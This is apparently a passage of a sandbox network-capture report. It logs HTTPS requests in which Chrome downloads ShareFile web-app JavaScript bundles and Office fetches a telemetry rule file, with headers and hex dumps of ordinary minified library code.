                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 74 75 72 6e 20 6e 75 6c 6c 21 3d 28 74 3d 65 2e 73 69 67 6e 61 6c 29 26 26 74 2e 61 62 6f 72 74 65 64 3f 79 3d 21 30 3a 6e 75 6c 6c 3d 3d 28 6e 3d 65 2e 73 69 67 6e 61 6c 29 7c 7c 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 61 62 6f 72 74 22 2c 28 28 29 3d 3e 7b 79 3d 21 30 7d 29 29 2c 65 2e 73 69 67 6e 61 6c 7d 7d 29 3b 63 6f 6e 73 74 20 61 3d 6d 28 6f 29 3b 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 61 29 2e 74 68 65 6e 28 28 65 3d 3e 67 28 74 2c 72 2c 65 2c 69 29 29 29 7d 3b 6c 65 74 20 62 3b 69 66 28 68 2e 6c 65 6e 67 74 68 29 69 66 28 6c 29 7b 63 6f 6e 73 74 20 74 3d 76 6f 69 64 20 30 21 3d 3d 63 2c 6e 3d 74 3f 63 3a 59 28 65 2e 6f 70 74 69 6f 6e 73 2c 68 29 3b 62 3d 76 28 68 2c 74 2c 6e 29 7d 65 6c 73 65 20
                                                                                                                                                                                                                                                                                Data Ascii: turn null!=(t=e.signal)&&t.aborted?y=!0:null==(n=e.signal)||n.addEventListener("abort",(()=>{y=!0})),e.signal}});const a=m(o);return Promise.resolve(a).then((e=>g(t,r,e,i)))};let b;if(h.length)if(l){const t=void 0!==c,n=t?c:Y(e.options,h);b=v(h,t,n)}else
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC11610INData Raw: 22 63 61 74 63 68 22 5d 28 28 65 3d 3e 7b 73 2e 63 6c 65 61 72 52 65 73 65 74 28 29 2c 6e 75 6c 6c 3d 3d 61 2e 6f 6e 45 72 72 6f 72 7c 7c 61 2e 6f 6e 45 72 72 6f 72 28 65 29 2c 6e 75 6c 6c 3d 3d 61 2e 6f 6e 53 65 74 74 6c 65 64 7c 7c 61 2e 6f 6e 53 65 74 74 6c 65 64 28 76 6f 69 64 20 30 2c 65 29 7d 29 29 3b 69 66 28 63 2e 69 73 45 72 72 6f 72 26 26 21 73 2e 69 73 52 65 73 65 74 28 29 26 26 21 63 2e 69 73 46 65 74 63 68 69 6e 67 26 26 67 65 28 61 2e 75 73 65 45 72 72 6f 72 42 6f 75 6e 64 61 72 79 2c 5b 63 2e 65 72 72 6f 72 2c 75 2e 67 65 74 43 75 72 72 65 6e 74 51 75 65 72 79 28 29 5d 29 29 74 68 72 6f 77 20 63 2e 65 72 72 6f 72 3b 72 65 74 75 72 6e 20 61 2e 6e 6f 74 69 66 79 4f 6e 43 68 61 6e 67 65 50 72 6f 70 73 3f 63 3a 75 2e 74 72 61 63 6b 52 65 73 75
                                                                                                                                                                                                                                                                                Data Ascii: "catch"]((e=>{s.clearReset(),null==a.onError||a.onError(e),null==a.onSettled||a.onSettled(void 0,e)}));if(c.isError&&!s.isReset()&&!c.isFetching&&ge(a.useErrorBoundary,[c.error,u.getCurrentQuery()]))throw c.error;return a.notifyOnChangeProps?c:u.trackResu
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 70 65 2e 75 6e 73 75 62 73 63 72 69 62 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 74 68 69 73 2e 5f 6c 69 73 74 65 6e 65 72 73 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 5f 6c 69 73 74 65 6e 65 72 73 2e 69 6e 64 65 78 4f 66 28 65 29 3b 2d 31 21 3d 3d 74 26 26 74 68 69 73 2e 5f 6c 69 73 74 65 6e 65 72 73 2e 73 70 6c 69 63 65 28 74 2c 31 29 7d 7d 2c 69 2e 73 6f 75 72 63 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 7b 74 6f 6b 65 6e 3a 6e 65 77 20 69 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 3d 74 7d 29 29 2c 63 61 6e 63 65 6c 3a 65 7d 7d 2c 65 2e 65 78 70 6f 72 74 73 3d 69 7d 2c 38 35 36 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 35 38 34 35 29 3b 66 75 6e 63 74 69
                                                                                                                                                                                                                                                                                Data Ascii: pe.unsubscribe=function(e){if(this._listeners){var t=this._listeners.indexOf(e);-1!==t&&this._listeners.splice(t,1)}},i.source=function(){var e;return{token:new i((function(t){e=t})),cancel:e}},e.exports=i},8563:(e,t,n)=>{"use strict";var r=n(5845);functi
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 74 65 22 2c 65 2e 45 6e 61 62 6c 65 53 6f 6c 75 74 69 6f 6e 49 6e 73 74 61 6c 6c 52 65 71 75 65 73 74 73 3d 22 65 6e 61 62 6c 65 2d 73 6f 6c 75 74 69 6f 6e 2d 69 6e 73 74 61 6c 6c 2d 72 65 71 75 65 73 74 73 22 2c 65 2e 53 65 6c 66 53 65 72 76 69 63 65 48 69 70 61 61 4d 4d 46 32 3d 22 73 65 6c 66 5f 73 65 72 76 69 63 65 5f 68 69 70 61 61 5f 6d 6d 66 32 22 2c 65 2e 45 6e 61 62 6c 65 50 61 72 74 6e 65 72 50 72 6f 66 69 6c 65 50 61 67 65 3d 22 65 6e 61 62 6c 65 5f 70 61 72 74 6e 65 72 5f 70 72 6f 66 69 6c 65 5f 70 61 67 65 22 2c 65 2e 45 6e 61 62 6c 65 43 61 74 61 6c 6f 67 46 69 6c 74 65 72 53 6f 6c 75 74 69 6f 6e 73 3d 22 63 61 74 61 6c 6f 67 5f 66 69 6c 74 65 72 5f 73 6f 6c 75 74 69 6f 6e 73 22 2c 65 2e 45 6e 61 62 6c 65 43 6c 69 65 6e 74 45 78 70 65 72 69
                                                                                                                                                                                                                                                                                Data Ascii: te",e.EnableSolutionInstallRequests="enable-solution-install-requests",e.SelfServiceHipaaMMF2="self_service_hipaa_mmf2",e.EnablePartnerProfilePage="enable_partner_profile_page",e.EnableCatalogFilterSolutions="catalog_filter_solutions",e.EnableClientExperi
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 65 20 6f 62 6a 65 63 74 20 69 73 20 75 6e 61 63 63 65 70 74 61 62 6c 65 22 29 2c 61 3d 30 2c 75 3d 28 69 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6e 29 29 2e 6c 65 6e 67 74 68 3b 61 3c 75 3b 61 2b 3d 31 29 73 3d 69 5b 61 5d 2c 59 2e 63 61 6c 6c 28 74 2c 73 29 7c 7c 28 74 5b 73 5d 3d 6e 5b 73 5d 2c 72 5b 73 5d 3d 21 30 29 7d 66 75 6e 63 74 69 6f 6e 20 4f 65 28 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 2c 73 2c 61 2c 75 29 7b 76 61 72 20 63 2c 6c 3b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 69 29 29 66 6f 72 28 63 3d 30 2c 6c 3d 28 69 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 69 29 29 2e 6c 65 6e 67 74 68 3b 63 3c 6c 3b 63 2b 3d 31 29 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 69 5b 63 5d 29 26 26 76 65 28 65 2c 22 6e
                                                                                                                                                                                                                                                                                Data Ascii: e object is unacceptable"),a=0,u=(i=Object.keys(n)).length;a<u;a+=1)s=i[a],Y.call(t,s)||(t[s]=n[s],r[s]=!0)}function Oe(e,t,n,r,i,o,s,a,u){var c,l;if(Array.isArray(i))for(c=0,l=(i=Array.prototype.slice.call(i)).length;c<l;c+=1)Array.isArray(i[c])&&ve(e,"n
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC14808INData Raw: 2e 72 65 70 65 61 74 28 22 20 22 2c 74 29 2c 69 3d 30 2c 73 3d 2d 31 2c 61 3d 22 22 2c 75 3d 65 2e 6c 65 6e 67 74 68 3b 69 3c 75 3b 29 2d 31 3d 3d 3d 28 73 3d 65 2e 69 6e 64 65 78 4f 66 28 22 5c 6e 22 2c 69 29 29 3f 28 6e 3d 65 2e 73 6c 69 63 65 28 69 29 2c 69 3d 75 29 3a 28 6e 3d 65 2e 73 6c 69 63 65 28 69 2c 73 2b 31 29 2c 69 3d 73 2b 31 29 2c 6e 2e 6c 65 6e 67 74 68 26 26 22 5c 6e 22 21 3d 3d 6e 26 26 28 61 2b 3d 72 29 2c 61 2b 3d 6e 3b 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 6d 74 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 5c 6e 22 2b 6f 2e 72 65 70 65 61 74 28 22 20 22 2c 65 2e 69 6e 64 65 6e 74 2a 74 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 51 65 7c 7c 65 3d 3d 3d 71 65 7d 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                                                                Data Ascii: .repeat(" ",t),i=0,s=-1,a="",u=e.length;i<u;)-1===(s=e.indexOf("\n",i))?(n=e.slice(i),i=u):(n=e.slice(i,s+1),i=s+1),n.length&&"\n"!==n&&(a+=r),a+=n;return a}function mt(e,t){return"\n"+o.repeat(" ",e.indent*t)}function gt(e){return e===Qe||e===qe}function


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                134192.168.2.64986913.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:23 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 425
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                                                                                                x-ms-request-id: df5113df-601e-0050-0cfd-192c9c000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180523Z-185b7d577bdd4z6mz0c833nvec0000000170000000018p4n
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                135192.168.2.64986413.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC575OUTGET /sharefile-web/sharefiledev-tenant-mgt-pilet/1.2.0/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC528INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Thu, 03 Oct 2024 13:08:00 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:03 GMT
                                                                                                                                                                                                                                                                                ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 0b9e85cfe8fe19b385db56d32b4ce802.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: UnZ48TXGjjld2izOmrLfTmZm6eS4MDxPsJOmMmrw0zxhxNhqfBU37w==
                                                                                                                                                                                                                                                                                Age: 45981
                                                                                                                                                                                                                                                                                Vary: Origin


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                136192.168.2.64986313.224.189.1154432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC420OUTGET /sharefile-web/sharefiledev-billing-pilet/0.1.121/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC548INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 98732
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 25 Sep 2024 15:09:00 GMT
                                                                                                                                                                                                                                                                                ETag: "cdca5117242386d7cabb8c5cdee3f9a1"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 9568a708c8ab21597698ebe7dce6c42e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: Vtonhor8Z3uDDONK9w3E8yGIlgxA3hfmyD2uU7WgC7Q_8hDZA6cCsA==
                                                                                                                                                                                                                                                                                Age: 45982
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC15836INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 62 69 6c 6c 69 6e 67 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 69 3d 7b 7d 2c 6f 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 75 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevbillingpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},o={},a={},s={},u={},c={};return
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 67 75 61 67 65 29 3b 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 76 61 72 20 6f 3d 4c 26 26 72 21 3d 3d 76 3f 72 3a 5f 3b 69 2e 6f 70 74 69 6f 6e 73 2e 6d 69 73 73 69 6e 67 4b 65 79 48 61 6e 64 6c 65 72 3f 69 2e 6f 70 74 69 6f 6e 73 2e 6d 69 73 73 69 6e 67 4b 65 79 48 61 6e 64 6c 65 72 28 65 2c 66 2c 6e 2c 6f 2c 49 2c 74 29 3a 69 2e 62 61 63 6b 65 6e 64 43 6f 6e 6e 65 63 74 6f 72 26 26 69 2e 62 61 63 6b 65 6e 64 43 6f 6e 6e 65 63 74 6f 72 2e 73 61 76 65 4d 69 73 73 69 6e 67 26 26 69 2e 62 61 63 6b 65 6e 64 43 6f 6e 6e 65 63 74 6f 72 2e 73 61 76 65 4d 69 73 73 69 6e 67 28 65 2c 66 2c 6e 2c 6f 2c 49 2c 74 29 2c 69 2e 65 6d 69 74 28 22 6d 69 73 73 69 6e 67 4b 65 79 22 2c 65 2c 66 2c 6e 2c 76 29 7d 3b 74 68 69 73 2e 6f 70 74 69 6f 6e 73
                                                                                                                                                                                                                                                                                Data Ascii: guage);var V=function(e,n,r){var o=L&&r!==v?r:_;i.options.missingKeyHandler?i.options.missingKeyHandler(e,f,n,o,I,t):i.backendConnector&&i.backendConnector.saveMissing&&i.backendConnector.saveMissing(e,f,n,o,I,t),i.emit("missingKey",e,f,n,v)};this.options
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 2e 65 73 63 61 70 65 56 61 6c 75 65 3f 63 28 73 2e 65 73 63 61 70 65 28 65 29 29 3a 63 28 65 29 7d 7d 5d 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 61 3d 30 3b 69 3d 74 2e 72 65 67 65 78 2e 65 78 65 63 28 65 29 3b 29 7b 76 61 72 20 6e 3d 69 5b 31 5d 2e 74 72 69 6d 28 29 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 28 6f 3d 6c 28 6e 29 29 29 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 66 29 7b 76 61 72 20 75 3d 66 28 65 2c 69 2c 72 29 3b 6f 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 75 3f 75 3a 22 22 7d 65 6c 73 65 20 69 66 28 72 26 26 72 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6e 29 29 6f 3d 22 22 3b 65 6c 73 65 7b 69 66 28 70 29 7b 6f 3d 69 5b 30
                                                                                                                                                                                                                                                                                Data Ascii: n(e){return s.escapeValue?c(s.escape(e)):c(e)}}].forEach((function(t){for(a=0;i=t.regex.exec(e);){var n=i[1].trim();if(void 0===(o=l(n)))if("function"==typeof f){var u=f(e,i,r);o="string"==typeof u?u:""}else if(r&&r.hasOwnProperty(n))o="";else{if(p){o=i[0
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 7c 65 2e 6c 6f 67 67 65 72 2e 6c 6f 67 28 22 69 6e 69 74 69 61 6c 69 7a 65 64 22 2c 65 2e 6f 70 74 69 6f 6e 73 29 2c 65 2e 65 6d 69 74 28 22 69 6e 69 74 69 61 6c 69 7a 65 64 22 2c 65 2e 6f 70 74 69 6f 6e 73 29 2c 6c 2e 72 65 73 6f 6c 76 65 28 72 29 2c 6e 28 74 2c 72 29 7d 3b 69 66 28 65 2e 6c 61 6e 67 75 61 67 65 73 26 26 22 76 31 22 21 3d 3d 65 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 61 74 69 62 69 6c 69 74 79 41 50 49 26 26 21 65 2e 69 73 49 6e 69 74 69 61 6c 69 7a 65 64 29 72 65 74 75 72 6e 20 74 28 6e 75 6c 6c 2c 65 2e 74 2e 62 69 6e 64 28 65 29 29 3b 65 2e 63 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 65 2e 6f 70 74 69 6f 6e 73 2e 6c 6e 67 2c 74 29 7d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 73 6f 75 72 63 65 73 7c 7c 21 74
                                                                                                                                                                                                                                                                                Data Ascii: |e.logger.log("initialized",e.options),e.emit("initialized",e.options),l.resolve(r),n(t,r)};if(e.languages&&"v1"!==e.options.compatibilityAPI&&!e.isInitialized)return t(null,e.t.bind(e));e.changeLanguage(e.options.lng,t)};return this.options.resources||!t
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 74 50 6f 73 74 70 72 6f 63 65 73 73 6f 72 22 5d 2c 69 6e 69 74 49 6d 6d 65 64 69 61 74 65 3a 21 31 2c 63 6f 6d 70 61 74 69 62 69 6c 69 74 79 4a 53 4f 4e 3a 22 76 33 22 2c 6d 69 73 73 69 6e 67 49 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 48 61 6e 64 6c 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 3f 74 2e 70 6f 70 28 29 3a 22 22 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 5f 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2e 75 73 65 28 6e 65 77 20 43 65 28 7b 70 72 65 66 69 78 3a 22 7b 3c 22 2c 73 75 66 66 69 78 3a 22 3e 7d 22 7d 29 29 2e 69 6e 69 74 28 4c 65 28 4c 65 28 7b 7d 2c 54 65 29 2c 74 29 29 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 29 7b 76 61 72 20 65 2c 74 2c 6e 3d 6e 75 6c 6c 21 3d
                                                                                                                                                                                                                                                                                Data Ascii: tPostprocessor"],initImmediate:!1,compatibilityJSON:"v3",missingInterpolationHandler:function(e,t){return Array.isArray(t)?t.pop():""}};function _e(e,t){return e.use(new Ce({prefix:"{<",suffix:">}"})).init(Le(Le({},Te),t)),e}function Ie(){var e,t,n=null!=
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 65 7d 6e 2e 64 28 74 2c 7b 41 3a 28 29 3d 3e 72 7d 29 7d 2c 34 36 37 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 29 7b 74 72 79 7b 76 61 72 20 73 3d 65 5b 6f 5d 28 61 29 2c 75 3d 73 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 6e 28 65 29 7d 73 2e 64 6f 6e 65 3f 74 28 75 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 75 29 2e 74 68 65 6e 28 72 2c 69 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 72 65 74
                                                                                                                                                                                                                                                                                Data Ascii: r("this hasn't been initialised - super() hasn't been called");return e}n.d(t,{A:()=>r})},467:(e,t,n)=>{"use strict";function r(e,t,n,r,i,o,a){try{var s=e[o](a),u=s.value}catch(e){return void n(e)}s.done?t(u):Promise.resolve(u).then(r,i)}function i(e){ret
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC976INData Raw: 6f 6e 65 6e 74 28 7b 68 72 65 66 3a 4e 2e 42 36 2c 74 69 74 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 41 28 4f 2e 52 65 63 65 69 70 74 73 29 7d 2c 77 65 69 67 68 74 3a 32 30 30 2c 70 61 72 65 6e 74 3a 4e 2e 43 69 7d 29 2c 6e 2e 72 65 67 69 73 74 65 72 50 61 67 65 28 22 22 2e 63 6f 6e 63 61 74 28 4e 2e 42 36 2c 22 2f 3a 6f 72 64 65 72 49 64 3f 2f 3a 73 75 63 63 65 73 73 46 6c 61 67 3f 22 29 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 61 2e 50 2c 7b 70 69 6c 65 74 41 70 69 3a 6e 7d 2c 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 4c 2c 6e 75 6c 6c 29 29 7d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 5f 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 61 2c 73 2c 75 2c 63 3b 72 65 74
                                                                                                                                                                                                                                                                                Data Ascii: onent({href:N.B6,title:function(){return A(O.Receipts)},weight:200,parent:N.Ci}),n.registerPage("".concat(N.B6,"/:orderId?/:successFlag?"),(function(){return e.createElement(a.P,{piletApi:n},e.createElement(L,null))})))}function _(e,t){var n,r,a,s,u,c;ret


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                137192.168.2.64985913.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC603OUTGET /sharefile-web/sharefiledev-permissions-pilet/1.118.31/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
